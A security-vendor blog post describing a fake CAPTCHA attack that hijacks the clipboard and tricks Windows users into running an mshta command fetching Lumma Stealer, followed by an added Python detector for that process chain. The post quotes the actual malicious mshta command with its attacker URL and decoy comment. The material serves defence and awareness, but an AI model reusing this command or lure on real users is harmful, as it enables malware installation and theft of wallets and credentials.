Clipboard hijacker tries to install a Trojan
Criminals are attempting to get users to install malware from the clipboard.
As patching and software quality improves over time, it gets harder and harder for criminals to run their malware automatically. This leaves them with two alternatives: Break into your computer and run it themselves (a tactic favored by ransomware gangs looking for a large return from a single attack) or find a way to get users to run it.
We recently observed an attack that uses clipboard hijacking for the latter: Fooling users into running malware.
The attack starts when visitors are lured to a website masquerading as a reputable news outlet, by a sensational news headline.
When they arrive at the website, they are shown a fake version of the familiar “I’m not a robot” CAPTCHA.
If they click inside the CAPTCHA look-alike, they are presented with a prompt that asks them to:
- Press & hold the Windows Key + R
- In the verification window, press Ctrl + V
- Press Enter on your keyboard to finish
Behind the scenes, the website had added the following command to my clipboard:
mshta https://solve.jenj.org/awjxs.captcha?u=25330553-e0c1-4aea-99ed-f76df7024daa # ✅ ''I am not a robot - reCAPTCHA Verification ID: 8370''
You may wonder how this is possible, given that browsers like Chrome, Firefox, and Safari require explicit user permission before allowing a website to access or modify the clipboard, typically through a prompt that the user must accept. In this case, the “permission” was given when the visitor clicked the CAPTCHA image: that click counts as a user gesture, which is all a page needs to write to the clipboard.
The so-called “verification steps” open the Run command prompt (Windows key + R), paste the command from the clipboard into the prompt (Ctrl + V), and then run it (Enter).
The command executes a script at a URL using the MSHTA (Microsoft HTML Application Host) executable—another reminder that it should be restricted in your environment.
The command contains a commented section that is designed to fool users into thinking they are continuing the task of proving they aren’t a robot.
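As an added example (not part of the original post), here is a small detector that looks for the chain described above in process-creation telemetry: mshta.exe started from the Run dialog (parent explorer.exe) with a remote URL and a trailing decoy “comment”. The events, field names and the URL are constructed for illustration, not taken from real logs.

```python
import re

# Constructed sample process-creation events (field names are assumed, not a
# real log format). The first one mimics the ClickFix chain: Win+R opens the
# Run dialog (hosted by explorer.exe), which launches mshta.exe with a remote
# URL followed by reassuring decoy text after " #".
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "mshta.exe",
     "cmdline": "mshta https://example.invalid/x.captcha?u=1234 "
                "# OK ''I am not a robot - reCAPTCHA Verification ID: 0000''"},
    {"parent": "msiexec.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe C:\\Program Files\\Vendor\\setup.hta"},
    {"parent": "explorer.exe", "image": "notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)


def split_decoy_comment(cmdline):
    """Return (real_command, decoy_text).

    The lure appends " # ..." so the Run dialog shows friendly text; mshta only
    cares about the URL it is given, so everything after " #" is cosmetic.
    """
    cmd, _sep, decoy = cmdline.partition(" #")
    return cmd.strip(), decoy.strip()


def analyze_event(event):
    """Return the indicator names matched by one process-creation event."""
    reasons = []
    if event["image"].lower() != "mshta.exe":
        return reasons
    cmd, decoy = split_decoy_comment(event["cmdline"])
    if URL_RE.search(cmd):                       # script loaded from the internet
        reasons.append("mshta_remote_url")
    if event["parent"].lower() == "explorer.exe":  # typed into the Run dialog
        reasons.append("launched_from_run_dialog")
    if decoy:                                    # social-engineering decoy text
        reasons.append("decoy_comment")
    return reasons


def find_alerts(events, min_indicators=2):
    """Events that match at least min_indicators, with their matched reasons."""
    return [(e["cmdline"], analyze_event(e))
            for e in events if len(analyze_event(e)) >= min_indicators]
```

A local .hta started by an installer matches no indicator, so only the Run-dialog launch with a remote URL is reported.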
The command runs a script that attempts to download Lumma Stealer, an information stealer sold as malware-as-a-service (MaaS). Lumma steals information from cryptocurrency wallets and browser extensions, as well as two-factor authentication details.
The ThreatDown/Malwarebytes web protection module saved the day.
Generally speaking, if a website asks you to run a command, go elsewhere.